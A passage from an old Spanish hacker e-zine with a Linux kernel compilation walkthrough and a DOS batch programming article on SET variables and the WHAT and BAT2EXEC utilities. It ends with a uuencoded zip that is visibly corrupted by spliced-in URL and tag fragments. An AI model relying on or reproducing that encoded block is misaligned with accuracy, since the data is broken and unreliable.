  CUALQUIERA ACCION QUE TOMEN. LA RESPONSABILIDAD DE 
  SUS ACCIONES CAE UNICAMENTE EN EL LECTOR/USUARIO DE 
  ESTE DOCUMENTO...BLA BLA BLA.. EN FIN, LA IDEA ES QUE SI 
  SE LA CAGAN, NO VENGAN A JODER ACA, SAQUENSE EL DEDO 
  USTEDES MISMOS...ETC,ETC. 
  ****************************************************************

  Compilar un  kernel  siempre ha  sido la marca de un verdadero  hacker
  de linux, pero por un momento olvidemonos de fantocherias y la actitud
  "poser" para ver que es la complicacion de un kernel de verdad, ...una
  necesidad  para  quien  quiera  sacar el mayor beneficio de su distro.
  Teniendo  eso  en mente, les  hago  una corta resumida pero espero que
  concisa y clara  descripcion  de  como  compilar  un kernel. Usare  mi
  primera  experiencia compilando kernel para guiarlos. Las situacion es
  la siguiente, tenia el redhat 6.0, pero que leche que justo despues de
  haberlo instalado  salio  un kernel  mas reciente. Weno ni modo que va
  uno a hacer, lo voy a bajar,  pero que  webo, yo estoy handicapped con
  un winmodem. Que hacer?


        1. Conseguir el Kernel.

  Primero, como  yo gozo de una linea aparte para mi conexion, y tarifas
  planas que hacen la llamada a mi ISP gratuita, me  conecte y me puse a
  bajar el nuevo kernel. Para los que no tienen tanta suerte, hablen con
  un  amigo  que  tenga cable modem y que se lo  grabe en un cd, o algo.
  Habiendo  bajando el kernel a mi particion  de win, lo unico que  tuve
  que  hacer  era  montar  el directorio  en cual habia bajado el kernel
  nuevo bajo linux. Lo que sigue tiene que ser desde root, no su.


        2. Colocar y preparar el kernel

  Bien ya tenemos el kernel nuevo  en nuevo en nuestra  particion linux,
  ahora que? Weno usualmente el kernel viene comprimido de x o y manera,
  digamos .tgz abrir una  pantalla  de terminal  paras dar  los comandos
  apropiados. Lo primero que tenemos que hacer es de-comprimir el kernel
  al directorio /usr/src/linux-x.xx.xx, x.xx.xx siendo la  version de tu
  kernel. Si lees  las paginas  man del  tar veras  los flags apropiados
  para hacerlo todo en una linea de comando, aunque si quieres lo puedes
  descomprimir  y   luego   mover.  Lo  descomprimimos  aqui  porque  el
  directorio src es donde se  deberian guardar  los codigos fuentes, asi
  estamos  organizados.  Luego  haz  un  link  simbolico hacia /usr/src/
  linux-x.xx.xx  desde /usr/src/linux.

  NOTA: Tienen  que  trabajar desde el directorio /usr/src/linux toda la
  distancia.


        3. Escogiendo tu interfaz de modificacion del kernel

  Bien  ya tamos  listos para el trabajo en serio, lo primero que tienes
  que hacer es un make clean, especialmente  si te la  kgaste y lo estas
  haciendo  todo  de  nuevo, esto  limpia  el clean para  que  te de una
  compilacion limpia, sin ningun error que hayas cometido  anteriormente
  (logicamente  no arreglara las kgadas que vayas hacer). Luego del make
  clean haz  un make config, make menuconfig o make xconfig, dependiendo
  de tus gustos. 

  Make Config: Es  en  modo terminal, y presentara las opciones una a la
               vez.

  Make Menuconfig: Nuevamente  desde  la  terminal, y presenta un menu a
                   base de curses. Es menos engorroso que el make config 
                   especialmente  ya  que  no  hay  que  configurar cada
                   aspecto del kernel, unicamente lo que se necesita.

  Make Xconfig: Corre  desde  X, y  es tan facil y bonito que cualquiera
                podria usarlo. Ademas  te permite ir a las secciones que
                deseas con un  clic. Hay aquellos  detractores que dicen
                que las GUI son para gays,  pero  la verdad es que tener
                un  GUI  para la  compilacion de  kernel  no es tanto un
                lujo, como casi una necesidad. Por lo tanto yo  hice  mi
                compilacion  con  el  xconfig, y  describire  el proceso
                usando el xconfig.

  Para aquellos que prefieran otro metodo, no las diferencias no son tan
  grandes para no poder utilizar los procesos dichos aqui.


        4. El Menu y las opciones

  Bien,  como ya dije, yo escogi el xconfig. Ejecutando  el comando make
  xconfig  sale una pantalla de menu, con distintos botones, cada uno de
  estos  botones  es  un  punto  general, al  pulsar  en  el saldran las
  opciones, estas  siendo marcadas Y,N,M. Y =Yes, N=no, y M=modulos, que
  es la opcion  que te  permite  especificar si quieres cargar la opcion
  como un modulo en vez de compilarlo al kernel, asi ocupa menos memoria
  de sistema ya que se carga unicamente  cuando se necesita. Aqui les va
  unos  tips  sobre  las  opciones  que  se  necesitan  y  las que no se
  necesitan 

        * En "procesador"  quiten  la emulacion matematica si su maquina
          es > 386, y escojan su procesador.

        * Quiten  la  opcion de  multiples procesadores si su board solo
          soporta uno.

        * En "code maturity level" Quiten la opcion de kernel hacking, o
          cualquier  parecido,  al  menos  que  quieran  hacer un kernel
          experimental.

        * Si no van a usar SCSI, quitenlo.

        * Compilen  el  soporte de red al kernel, ya que hay posibilidad
          que los modulos, cualquier modulo, se kgue. Habiliten el ppp o
          slip.  Tambien  carguen  los  protocolos que vayan a necesitar
          (TCP/IP, IPX/SPX, etc)

        * En "block devices" habiliten el iso9660 para su cdrom

        * En "Native Languanges" quedense con el idioma que  van a usar.

        * No se les olvide compilar el soporte para discos IDE.

        * Compilen los sistema se archivos que quieran poder ver y  usar
          (cualquier  hacker  que  valga 3 centavos  incluye,  aparte de
          ext2, umdos o fatx, ntfs, y talvez  una  que otra formato para
          sun o *nix).

  Listo? Perfecto.  Save y exit. El programa  escribira  un  archivo  al
  directorio /usr/src/linux..... el  mismo se llama .config, asi que con
  un ls se veria /usr/src/linux/.config.


        5. Compila y correlo

  Acuerdate  que  toda  la distancia tenias que estar en /usr/src/linux,
  weno  desde ahi (terminal, terminal) das  un  make dep,  que  crea las
  dependencias necesarias. Luego das un Make clean o si prefieres, hazlo
  todo en una linea,

  # make dep; make clean

  Luego, para  poner el  kernel a compilar, solo escribe make boot, make
  zImage,  make zdisk o  make bzImage.  Cada  uno  tiene  su  uso,  para
  situaciones distintas, pero como  queremos  es compilar nuestro kernel
  lo  menos  engorroso  posible,  usamos  el make bzImage. Si todo salio
  bien, tendremos nuestro  kernel nuevecito compilado en /usr/src/linux/
  arch/i386/boot. Copia  este  kernel a /boot. Weno  falta  modificar el
  lilo  para  que  incluya  el  nuevo  kernel.  Ve  a  /etc/lilo.conf  y
  modificalo. Solo  copy y paste  una  de  las secciones que  esta ahi y
  modifica  para  que  diga  /boot/bzimage  donde  se  escoge  el kernel
  (posiblemente tengas /vmlinuz) a cargar. En el label del  viejo kernel
  nombralo mi kernel viejo, o algo que te recuerde que ese  es el  viejo
  kernel  que tenias ahi. Carga a /sbin/lilo para  que se  registren las
  modificaciones.

  Ahora  con  los  modulos. Ve a /lib/modules/x.xx.xx que  debe tener el
  numero de tu kernel viejo y muevelo a un archivo que diga x.xx.x-viejo
  o algo  asi.  Regresa a /usr/src/linux y  haz  make modules,  y cuando
  termine, make modules_install. 

        6. Terminando

  Shutdown -r now, y cuando entre al nuevo kernel ve al  directorio  que
  se creo,  debe  ser  /lib/modules/x.xx.xx, donde  x  es el  numero del
  kernel  que  compilaste, y una  vez ahi da el comando depmod -a.  Esto
  creara una lista de los modulos a cargar y que orden cargarlos. Haz un
  poco de todo con el linux para verificar que todo  salio bien. Lo digo
  porque cuando  compile el mio, deje fuera muchas cosas  necesarias,  y
  tambien  me di  cuenta que el  soundcfg ya  no funcionaba. Si  hay que
  compilar nuevamente, ya lo tienes todo listo para hacerlo.

        REPASANDO
        ---------

        1. Bajar  el  kernel y  descomprimirlo,  colocarlo  en /usr/src/
           linux-x.xx.xx y hacer un link hacia /usr/src/linux.

        2. Make clean, Make Xconfig, seleccionar opciones.

        3. Make  dep; make clean.

        4. Make bzImage, copiar el kernel al boot.

        5. Modificar el lilo, resetealo llamando a /sbin/lilo.

        6. Mover   /lib/modules/x.xx.xx   a  /lib/modules/x.xx.xx-viejo.
           Regresa    a    /usr/src/linux    y  haz   make modules.  Haz
           Make modules_install. Ir a /lib/modules/x.xx.xx. 

        7. Shutdown, y luego haces depmod -a.

                        Teken Melocotoff
                Escojamos. Seremos lobo, oveja, o pastor.


   ͻ
͹ Programacion en Batch II ͹Combel
   ͼ

[ Intro ]
  ~~~~~
  En este  Texto  se  exponen  diferentes trucos y consejos para los que
  conocen el  Lenguaje  Batch puedan encontrar ciertas ideas de utilidad
  para sus programas.

  Este texto  no  pretende  del todo ense~ar a programar en Batch "Desde
  Cero". Si no  sabes programar en BATCH, lee HVen!!! Que la gente de
  hoy en dia no lee... ;D.

  Supongo  que todos  se  preguntaran  cual  es  la  utilidad   de  este
  pseudolenguaje de  programacion... la verdad, en  DOS  aun  hay  gente
  que lo trabaja (yo  utilizo mucho esto ... y tambien trabajo en BP7 =D
  y considero que DOS aun funciona mejor que wind0ze).

[ Continuando... ]
  ~~~~~~~~~~~~~~
  Veamos algo, supongo que todos saben programar en BATCH, porque sino..
  De que os sirve estar leyendo esta vaina? Jeje, continuemos.

  El uso  de  las  variables  te  puede  ser  de  gran utilidad. En este
  caso no  me  estoy  refiriendo directamente a las variables que pueden
  ser definidas  mediante   parametros  de  la  linea  de comandos. Sino
  las  variables  que  son  definidas mediante el comando SET (Que no es
  Saqueadores Edicion Tecnica =D).

  El  comando   SET   nos   permite   declarar  una  variable  para  ser
  utilizada  en  un  archivo  Batch  o  por nosotros mismos. La sintaxis
  correcta para declarar una variable seria la siguiente:

C:\>Set NombreDeVariable=ValorDeVariable

  Eso es todo, esta declarada la variable. Para referirnos a la variable
  desde cualquier momento solo colocar asi:

%NombreDeVariable%

  Tomemos  un  ejemplo. Si  queremos mostrar  en pantalla el valor de la
  variable "VAR" podemos proceder asi:

Echo %VAR%

  Ahora, se  volvera extremadamente necesario el hecho de que tengas que
  eliminar totalmente una variable, esto lo logras asi:

Set NombreDeVariable=

  Y se elimina la variable.

  El  comando  SET, si  lo  ejecutamos  sin ningun parametro nos dara un
  listado de  todas las variables que han sido declaradas anteriormente,
  ya sea por el mismo sistema, por el AUTOEXEC.BAT, por el mismo usuario
  u otro programa. Algo asi por ejemplo:

C:\>set
TMP=c:\windows\TEMP
TEMP=C:\windows\TEMP
PROMPT=$p$g
COMSPEC=C:\COMMAND.COM
PATH=C:\DOS;C:\WINDOWS;C:\WINDOWS\COMMAND
windir=C:\WINDOWS
BLASTER=A220 I5 D1 H5 P330 T6
CMDLINE=edit batch2.txt

  Eso  que ves  ahi  son las diferentes variables del sistema, si tienes
  algo  de  ngenio  puedes  encontrarle  una  excelente utilidad a estas
  variables, como   por  ejemplo  localizar  el  directorio de Windows o
  hacer que  un  programa  sea ejecutado desde cualquier parte del Shell
  de DOS. A  continuacion  explico  en  que  consiste  cada  uno de esos
  enunciados:

TMP = Variable  utilizada por Windoze para que cuando se necesite enviar
      un   archivo  temporal   este   sera  enviado  a  %tmp%  o  sea  a
      C:\windows\TEMP sin ningun problema.

TEMP = Por  lo  que  se  ve  su valor  es similar a %TMP% y significa lo
       mismo.

PROMPT = Esta es  utilizada por el MS-DOS, es colocada normalmente en el
         archivo  AUTOEXEC.BAT  y  es en la que se especifica el aspecto
         del interprete de comandos, $p$g quiere decir C:\> jeje.

COMSPEC = Utilizada por  MS-DOS, y  es  en  la  que  se  indica donde se
          encuentra el  interprete  de  comandos (Shell) a  utilizar, en
          este caso esta en C:\COMMAND.COM.

PATH = Esta indica donde se encuentran  ciertos  comandos que pueden ser
       utilizados  en   cualquier  parte  del  Shell  de  MS-DOS, o  sea
       generalmente   en  estos   directorios   se  encuentran  archivos
       ejecutables  que  uno  utiliza  a  menudo   como   son  EDIT.COM,
       QBASIC.EXE,   XCOPY.EXE,  CHKDSK.EXE.  Si   deseas   colocar   un
       directorio  con  algunos  ejecutables  que   quieras  correr  por
       cualquier  parte del Shell lo unico que debes hacer es colocar en
       tu archivo AUTOEXEC.BAT o desde tu Shell lo siguiente:

SET PATH=%PATH%;DirectorioConLosEjecutables

  Si  sabes  interprentar  bien  la  vaina  te  daras  cuenta que lo que
  hace  es  colocar el valor anteriormente utilizado por PATH, colocando
  algo nuevo de manera que se conserve el PATH viejo.

Ejm.: SET PATH=%PATH%;C:\TOOLS\PKWARE

WINDIR = Es  utilizado por Windoze para especificar en que directorio se
         encuentra.

BLASTER = Bueno esta es utilizado por mi tarjeta de sonido Sound Blaster
          16 :P para que cualquier programa que la vaya a utilizar pueda
          encontrar  donde  estan configurados los IRQs, DMAs y demas de
          esta...

CMDLINE = Esta  es  propia de Windoze y es bastante interesante, aqui te
          muestra cual fue el ultimo programa que ejecutaste en el shell
          o  sea  que  en  cualquier  momento  yo pongo %cmdline% y sigo
          escribiendo esto :D...
<>

  Cada  vez  que  vayas a utilizar los colores en un programa Batch bajo
  ninguna   circunstancia  olvides  cargar  el  driver  ANSI.SYS, puedes
  declararlo  colocando  la siguiente linea en el archivo C:\CONFIG.SYS:

DEVICEHIGH = C:\WINDOWS\COMMAND\ANSI.SYS

  Y te permitira utilizar los colores en tu archivo Batch.

  Contradiciendo  a lo anteriormente escrito, no recomiendo que utilices
  los  colores en un archivo Batch, ya que si este es utilizado en algun
  computador  que  no  tenga  cargado  el  driver  ANSI.SYS  el texto se
  mostrara realmente desastroso.

  Se  que  los  colores puede que se vean muy bien en los archivos Batch
  pero  evidentemente  no seran de mucha utilidad si es que este archivo
  va a ser distribuido.


<>

  Utiliza el poder  de  los  comandos  que te ofrece MS-DOS (O Windoze).
  Un ejemplo  de  lo que pueden hacer por ti estos comandos seria con el
  comando  ECHO, que  no  solo  sirve para mostrar un texto en pantalla,
  sino  que  tambien  nos  sirve  para  a~adirle una linea de texto a un
  archivo...

  Veamos, si colocamos en el Shell lo siguiente...

ECHO ESTO ES UNA PRUEBA >PRUEBA.TXT

  Esto creara un archivo llamado "PRUEBA.TXT", si este ya existe simple-
  mente  eliminara  el  contenido de este y veras en la primera linea el
  texto "ESTO ES UNA PRUEBA".

  Para evitar que se elimine el archivo, sino que anexe el texto escrito
  al final del archivo, utilizamos Doble Mayor Que (>>).

ECHO ESTO ES UNA PRUEBA >>PRUEBA.TXT

  Si, esto  lo  indexara  al final del archivo pero SOLAMENTE si este ya
  existe. Asi  que  seria cuestion de utilizar primero un solo Mayor Que
  (>).

  Otro  ejemplo  de  esto puede ser el Windows Scripting Host, que viene
  con  Windoze '98, y  nos  permite  ejecutar  codigo  de Visual Basic y
  JavaScript desde  el Shell de MS-DOS, de manera que podriamos utilizar
  un programa en Visual Basic  a  traves de nuestro Archivo Batch. No me
  he  puesto a profundizar mucho esto pero se ve que puede funcionar muy
  bien.

<>

  Existen   infinidades   de  programas  que  te  pueden  ayudar  cuando
  programes  en  Batch. A  continuacion  explico  dos  programas: WHAT y
  Bat2exec.

WHAT


  What  es un programa que se denomina a si mismo "Batch File Enhancer",
  recomiendo  altamente   su  uso ya que definitivamente es excelente. A
  continuacion   explico   todo   sobre   el   WHAT   y  sus  diferentes
  utilizaciones.

  WHAT  es  un  programa utilizado para proporcionarle al lenguaje Batch
  la  capacidad de hacer cosas que con los comandos comunes del Shell de
  DOS no nos era posible hacer. Echemos un vistazo al programa:


                        WHAT - Batch file enhancer

Command                 Purpose     Argument   Environ     Exit        Extended
---------               -------     --------   -------     ----        ------
C[E] ["prompt"] [chars] Get         Allowable  Character   Character   Echo
                        character   characters

S[E] ["prompt"]         Get string  None       String      Length      Echo

D[E]                    Check DOS   None       Major       (Major*10)  Minor
                                               version     +Minor      version

E[E]                    Get environ None       Bytes       Bytes/10    10 bytes
                        bytes left                         bytes       in exit

F[E] filespec           Get file    Filespec   Kilobytes   Ks/10Ks     10Ks in
                        size                     (255=directory)       exit

K[E] [driveletter]      Get disk    Drive      Kilobytes   Ks/10Ks     10Ks in
                        space                                          exit

M[E]                    Check       None       Kilobytes   Ks/10Ks     10Ks in
                        memory                                         exit

P                       Check for   None       1=yes,0=no  1=yes,0=no  None
                        printer

V [number]              Get/Set     New mode   Current or  Current or  None
                        video mode             last mode   last mode

7                       Check for   None       1=yes,0=no  1=yes,0=no  None
                        coprocessor

A                       Check for   None       1=yes,0=no  1=yes,0=no  None
                        ANSI driver

Y[E]                    Get current None       Directory   Level/Drive Drive
                        directory

                  (AL FINAL DEL ARTICULO ESTA EL PROGRAMA)

  "A buen entendedor pocas palabras bastan"  =D  jeje. Ahi se te explica
  completamente  los  diferentes  parametros  que puedes utilizar con el
  programa.
  Cabe  destacar  que  todos  los  resultados el  programa  los colocara
  en  una variable  llamada  WHAT,  de  tal  manera  que s u uso se hace
  mas flexible.
  Tambien  te  habras  fijado  que  en la linea "Extended" estan ciertas
  opciones utiles para cada comando con su explicacion.

  He aqui una explicacion de todos los parametros del WHAT:

C: Hace  que  el  usuario seleccione  UNA  y SOLO UNA tecla y la envia a
   la variable  WHAT, nos  puede  ser  muy util para crear un menu entre
   muchas opciones diferentes. El uso del EXTENDED en este caso hace que
   la  tecla  seleccionada  no  se  muestre  en pantalla. Un programa de
   ejemplo podria ser:

@Echo OFF
WHAT C "PUYA UNA TECLA!: "
Echo LE DISTE A LA TECLA "%WHAT%"

S: Este es  muy  util, cumple  la  misma funcion que C con la diferencia
   que en este no se envia una sola tecla sino un conjunto de caracteres
   (String)  o  hasta  una  frase  entera hasta que se presione la tecla
   Enter. El uso del EXTENDED en este caso hace  que  la  frase  escrita
   no sea mostrada en pantalla. Un programa de ejemplo podria ser:

@Echo OFF
WHAT S "Quien Eres? "
Echo TU NOMBRE ES "%WHAT%"

D: Simple, Te  muestra  la version  de  tu  sistema DOS, si colocas solo
   "WHAT D"  te  mostrara  la  version  mayor, pongamos  por ejemplo que
   tienes  la  version 7.1,  la  version   mayor  seria "7". Si  colocas
   "WHAT DE" te mostrara la version  menor, que  en  el caso del ejemplo
   esta seria "1". Un ejemplo:

@Echo OFF
WHAT D
Echo LA VERSIoN MAYOR DE TU DOS ES %WHAT%

E: Te  muestra  cuanta  memoria  en  Bytes  hay  disponible  para seguir
   declarando variables. Un ejemplo:

@Echo OFF
WHAT E
Echo TE QUEDAN %WHAT% BYTES LIBRES! SUBE COMO LA ESPUMA, Y BAJA COMO EL COCO!

F: Te  muestra  nada  mas  y  nada  menos que el tama~o en Kilobytes del
   archivo que especifiques. Un ejemplo:

@Echo OFF
WHAT F YAGA.BAT
ECHO EL ARCHIVO YAGA.BAT MIDE %WHAT% KILOBYTES.

        (NOTA: SI EL TAMA~O ES IGUAL A 255 ES UN DIRECTORIO).

K: Te  muestra  la  cantidad de espacio libre en Kilobytes que hay en la
   unidad que especifiques. Un Ejemplo:

@Echo OFF
WHAT K C
ECHO %WHAT% KILOBYTES LIBRES EN LA UNIDAD C:

M: Te muestra la cantidad de memoria alta disponible en Kilobytes.
   Un Ejemplo:

@Echo OFF
WHAT M
ECHO %WHAT% KILOBYTES DE MEMORIA ALTA LIBRE

P: Te  indica  si  la  perola tiene impresora conectada o no (Notese que
   1=YES y 0=NO). Un Ejemplo:

@Echo OFF
WHAT P
IF %WHAT%==1 ECHO SI HAY IMPRESORA

V: Te muestra el modo de video actual. Un Ejemplo:

@Echo OFF
WHAT V
ECHO EL MODO DE VIDEO ES: %WHAT%

7: Te muestra  si  la PC posee procesador (Eso ya no se usa, pero es que
   el  programa  es  bastante  viejo, para  esos tiempos de las *87s :P)
   [Notese que tambien aqui 1=YES y 0=NO].

@Echo OFF
WHAT 7
IF %WHAT%==1 ECHO SI HAY PROCESADOR

A: Te muestra si existe un controlador ANSI como el ANSI.SYS (Tambien se
   utiliza 1=YES y 0=NO)

Y: Bastante  util. Te  muestra  el  directorio  en el que estas ubicado,
   si  lo  pones  en modo EXTENDED te contestara con la unidad en la que
   estas ubicado.

@Echo OFF
WHAT Y
ECHO ESTAMOS EN %WHAT%

  Bueno, esto  son  solo  peque~as  muestras de lo que el programa puede
  hacer  por nosotros, claro  se  pueden  hacer  muchas  cosas mas, todo
  depende  de la imaginacion que tenga el programador para hacer esto.

BAT2EXEC

  Este es  un  programa,  que  aunque  algo  viejo  (1990), sigue siendo
  muy util. Es  un  programa hecho en Assembler que te permite convertir
  un  archivo  desde  .BAT  a  .COM, puede  ser  bastante util para  que
  nadie modifique el codigo  de este :) y otras intenciones. La sintaxis
  del programa es simple:

C:\>bat2exec perol.bat

  ...Y  automaticamente  tendras  perol.com para ti. Cabe  destacar  que
  ahora  los archivos son binarios, de maneras que se haran MAS GRANDES.
  Abajo  incluyo  el  maldito programa en formato UUEncode (El codigo en
  Assembler no lo mando por  dos  razones: 1.) No  todos  tenemos TASM u
  otro  compilador. 2.) El  codigo  ocupa unos 150 Kb, creo  que es algo
  excesivo y recargara el E-Zine, pero si lo necesitas solamente mandame
  un mail.)...

[ Los Programas ]
  ~~~~~~~~~~~~~
  A  continuacion, estan  todos  los  programas  que yo habia mencionado
  que se recomendaba utilizar. Los coloque a los dos en formato Zip y en
  UUE  pa' que  no  molestara  mucho  en  el E-Zine. Por  cierto, si  no
  saben hacer UUDecode, les toca aprender :).

< INICIO. COPIAR DESDE LA SIGUIENTE LINEA. >
begin 666 batch.zip
M4$L#!!0``@`(`!`?86A$W%KI`8``&(,```(````5TA!5"Y%6M5G]H&]<=
M?W?RDZQSU3BIY=)U*"=C1.++#Z70%#;9V+&MMG.=JO5(E+IF4Z2S=8MTYYW>
M.7/I/#4)CJ,+I@0*^;,)91LEA#33AN5`HOF*/:_>><"C#BM;8Z&HBN*M@6R
M'4.@%[EF;U&Z_$NFW_HSFZ\W_2&/QEZ;X(JH)[<\N6+]VC&YHA\!?7'S\![
MWD"N-6Q==GQG!7%WU_+L=9?I+_T^DNT0(=`:LE].(&>>S=TV_='+7IQ-$S0(
M(PD/9$,_1/75B(OS3B\,7FZ&\W@+:UA#+&%@4-/L$S#/Z:NF/YS[=ELE/`]`
MZ>D;7EB(`#LS!*=7Q86A:49]I#I?S6"`<`@^II:7[`=I&N>.""VR7!$)8*H*[JMAI8:Q,X`5ELPG+ZS/[]:L`8
M^6UFX^F.,Y!Y\UL1W8W)E;S#X)Z[$[@FVW3<;HQ>M!<8PM_^2G0&`
MQ!488W;$[KSS>L7T:PVS*?HH%$O;9YR/$=NL1BTS#+!RC&'7GZ8_MY+]
ML&LJ8'?XHG[;N]7#;DKZ>?QXS+!Z^$GI=8PYQQ97U\J=3CS?!"\;L%9L+
MX#FCTX)5$(^^#+E1.=2"6G"W.S%7X!R>'N*H
MQXZZD&=EK?Q)X!P>QE*+_E!8O(*W[0BUK)0#YSHF('5E8>DW>KE0J93F"&D4
MMW<""WI]-QB@8Z_>/$';FN_6L!-`_UC*FW%F^-P]6H@VP[0KGO]1U_!
MCP4(UGZNEX_]0/O+V8>K5\^6]8^$/_A(\-I[@7D(=K[;!-ON0P@<"]^=^^E3
MU8CWEBX)(#%!I!^<[TO%#1?X>GK;AZ%4&A^-=C&R0K[8'^1SSG$:>PB"LG+)77
MLG/!5[LPW1HI\OGEZ>(M+XR^?W?#%36R&[$WZ[,;;_S,D?T;;\QR@/::P5WE
M'9N=`![.[78??:'K^_Q>_E`,Q9/\L)02>5%.QN2XJ'HX#]>MI-,Q.8'W131U
M5,F(;AZO+G5[*3] [http://www.govannom.org/e-zines/hven/hven003.txt]XLRPK!7'I-412;FWI](B+HI1J*<$!,>;F]MN=TU0#;4K%]!
M=Q76*&PK3F&P=X@?;!E5E?0H:AER#\:3,34SY'Y>M-6Z4BGE9.PX3ISOQIY8
M'(DJ_RCNC2<5>MCX%N,FSI"##OR;"J'G,TB5Y!&>/ZS(8C6K`6HBPB^)\@A*
M5H]+!3Q<#V;!,MU),7Z"[WEY@'\DMC_V(T4EH;LH:CL0W(V-DJRH-#EW[>1C
M."?)KJE`W8^8B4ZOK4-R%.T&;-4Y-([$C+L&]A\($B/^/4X>J11%?$H<1K:J
M_6PO2>9%W$DB$R9%(3.1&17CMAR=$+S"52N&?5)*J1'T$;D^FXH"2::"&>D-
MD4CM>N;99]L3DBK&D:*.[ZY*UO3Z:!,2JC0FID2T.[S">DS`FRK8_BU-I*%;2OMU=--B
M&I_M/PIOSL8P;>H6X@/MXV)F3[!=5A[%9`ME'<5SA^Q+>80?E+7T<5(>4I_]
M`]6;<%@\R:>5!*'LUE257%`BLQ5OTHU)"5&ANVM)IF(95`O?QNN6^0=5S!
M-RJ.RZW0S+N^`577X8>3H;E.K85U<@7CW@%K:>VHC1BXK':;\]//27TFT.
MH8=KC?SW_[4YGAX\*+?6XT72(:"5O&G;:_[N@2,]_;U]XI:]B%{jumi [*3] [http://www.govannom.org/e-zines/hven/hven003.txt]}"`!*>)/+3QZ
MD/[@9)#8;JN!BA`B50@(#84-1@V='@)N^9L=L9GYL=:[C%[>R<,S/G[-F>
M[=9VSD'JZ)CM(615-!;&MG2K/:-M[8RMMM/'O-:.X"@(Y.UW$]">G7-VS^;`
M>_=^][O?W_V^[W[?&WL/&_3K*IO+K"W6*GZEZ3'^X:V/\"N??+)T!7VNY-NZ
M.COYJNZ=.T5?U]8.H:O;%X"I26]HJ.+K.K9W/-_E\_()OKI;W+ZC(\"OZ][1
MY=NN-Q0MK:U!#FL=JK$[D+5JO1W9[,UV9&VI;48-E9N:K*AI?6U-,VJR-J.J
MRHT;`=B\'C4X['4-`*A&==7(48VJ-C:AZEH'JK9N!&+UR&EU(*=](ZIJ;FY%
M5>NK&E!S:X,55=D;6E%U9;,5-=?669'540GTJ];3G74;Z--11Y_K'-;*#91.
M)2`!22ML`(JU-4#+7E=765^-$)_&&UY,ES*)GC?S7@HJ$O2VU3;A>[^5!7]U:_94^=I:"]::2HL++PW+4M.
M7[H?:>@>$PB!^._^#'JKW]_MY[M\_`YJYJ)ZKW<;7VUOXLM,I3PL;/=[.P2O
MO\B@;]KC$SI^N)J_>Y2=73N\OHZ=7I/WAX)!7U35X7M(`*!O&U#;)0K)]:+Z
M;H'W^N#HGN-W>G=V^_<`Y#OK?&"7=VM79Y=W6Q'(-@?J>M[+"]W=_):N[44I
MKKR72EDK(+,/S\M@ZA@]\B=G;"N%//8F_Q
M\CYO0(`E4'.092+IHX4SD=+1POUG!X]@:0;[-_WG2_='GHZA[-'"5T.8Y7Z"
M7[/CR/HD8#"!_8^]5C<_]3_RF@N?E)#YG#Y32*LINRRW9P2T@\-8R>[16+XO
MZ.1C>K]6X09E/+:'(8^',*FPXWTC/%*Y,`;TT@Q_MOPFEBQK1:9&?I[Q?Z1\
M:3$(GXW94BR8.A6%\MF(3/CF;
M138FU%6A8-V3(R-N.1]]G2L"9-%[(>A
MIU2AB"T([04N6L:&E>MD(C2L-9_KL6N,NE,'V(E#@__`CKT-7$KR[+@X_//%
M\Q3W(T2,&S!YO!8?S*]+$@UP@P^S8[$9&.!%F'_C>4)%1`QTF($;PYI&<;_
M*8S2DJ,+,-(G1[^%42;2JLA_,ES1BK59R+_PF.9#&<`:5#R\OP#19SY"OY
MW.#+>+20?!19F_]VWB9L(L967/+.:&%!I&*TL&RH(5)K.LC5493\%W%H6A4U
M=*$ELG&TT%@0J@AC).0Z!OR]?27@UC>3QM\#U6OI36)G^:=I11AF)&!$>V
M6BB,92++0EJ;PI-IP73CC-R(#W`U+O/
M7]L7S\;JHG@C9]29+V2<%QXT7W:2=R;>\(A:J1P)2ZO*AIZPJB)CC^K1^!$`
MB9_%#&A*UQH/36?Z66`QJ8PWF(<4MB'"N)Q,<[*3] [http://www.govannom.org/e-zines/hven/hven003.txt]^:3.
M?$Z^S$D5SZ3`\(H9ELB_HN"S`.X`$*2UXZC#(I)2^2#.OE-;I@#L%2Q#=:6
MD+PMV'S9/"2/(PIFACD`AV%#W"G_5!WFW!B1Z_V6!T7-K3PWEBI@+EZWO""N
M':Y6#3$O0#P`86,"OI7GP6"71>)]Y!)UIO"BWB".,/(?M&5#?6%@0TDS25Y.
MI#1:*L1B\V4)7KB_J@EB)#.-7`+T7U-TNK]%_CZ2#R!%LEC;#^M2ZY_D_S
MZ_):)'>AL6=5""1VK%6=],2=#=&5*..RD!=K7B"_QC7%.!0M1'),2SYT1\M0
M[.QBN9=SRX>UU%`,X(-5`#V7H@O<''8O8$?!C*5+Y&:^6VAIP74=Y,EO?
MMR;AGVZ/@SC/Z,C[Y-()A-XT\'PY9,O<-S-YBR`:P(^":5;`6$,Q;AQGY3*=
M?Q',2W3[+.7E(.L!5$-SR/VZ`%9V.\D-ERUEL0B6CVE`NXS+[@-9QYB47)]J
M8VE)N?ZB2$/,BRW.HZ?Q8TZRE(L%5,X`
MIRPB$Z>>P*$IK3@,.&=BTPLI3AM'[LS),<6"',<*P9CW41D>FI=A+UD,LT480SOA'8*&+EY9H&]?$--#OFLH,_1:#R(Y]@"P/BSSV@;U[
M#Z^YX_^FW2/_)_C)POX3;@[[$HBC3R8RQH5W*&HPI2]:2*2AJS)&\=
MCOW;0ODF"\XH9[.3PZ`ABH?.'9I+E$#2B^FBK^[RSY73(0@4/H#)X[D2,8O`)BP;Q0WL="
M`"9-K"'YZ[#\,ZPL?)G,RH\C$H>47L+9<10Q\@L8=/5I)N-3RDP-9ZFX@&
M4"9LHRO-L`("3"E3/LQ,QFTNY\ER_/HA#_"QI/A(IUE@E++9=Q*#>YZ/P$#X`9FN
M7-F&Y4X@<@(C)]S&YLNRG?4$#"=8I*2=8)#"0EK8!-`G67+)KP4.GZ"YI)7*
M3TFZ[#S=90R]56I:+^8D1_>7C2,R3+'M%;5]_C9(I69X,:B5+:0`GXOK+`BO/3/8I
M?6WQ34X71ZLA,B9]GB5-,:+A9#PKW(RC&JA#E`>E*0R0D7N0;&F*%3-.O@L0
MAH;F(3)*'6`J&]#>SPIOOK>1!\B%>Q#86`H;+P+D[L8OLP#G%J!G!J
MI%DJP-&L*`<0#)!5TBP5X"V*TVMEDY1G68#$[D&RI5D-4![*`B))RB9:TNG:
M/<_$&QW$-I,Q)*XB[[Z8;\/A+&)+L+:9$ALF'Q,[9D^';3/7%IT?"U#8U-
MI$`>5=UA72B.6Z_^N:6M-9YO+*"5;4'<(4^HM-+Y1FV+-P%G\X68'MV>D,Z4
M.JY.P/QX:9O^$VFZ5-!$H':Z.NZ.NYSS%92)7#SU,H:HA5I$T%E,`MMW]>9)
